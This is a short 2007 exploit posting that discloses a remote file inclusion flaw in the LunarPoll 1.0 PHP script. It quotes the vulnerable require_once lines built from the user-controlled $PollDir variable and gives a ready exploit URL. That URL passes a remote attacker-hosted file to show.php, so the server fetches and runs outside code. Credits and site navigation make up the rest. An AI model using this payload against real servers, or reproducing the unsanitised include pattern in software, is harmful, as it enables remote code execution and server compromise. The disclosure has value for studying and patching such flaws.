[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : LunarPoll 1.0 (show.php PollDir) Remote File Include Vulnerability
# Published : 2007-01-12
# Author : ilker Kandemir
# Previous Title : sNews <= 1.5.30 Remote Reset Admin Pass / Command Exec Exploit
# Next Title : TLM CMS <= 1.1 (i-accueil.php chemin) Remote File Include Vulnerability
-------------------------------------------------------------------------------------------------------------------
AYYILDIZ.ORG PreSents...
Script:LunarPoll
Script Download: dexxaboy.com/scripts/lunarpoll/download/
Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>
Code:
require_once($PollDir.'/includes/functions.php');
require_once($PollDir.'/includes/IO.php');
-------------------------------------------------------------------------------------------------------------------
Exploit: show.php?PollDir=http://attacker.txt?
-------------------------------------------------------------------------------------------------------------------
Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR
Special Tnx: AYYILDIZ.ORG
# www.Syue.com [2007-01-12]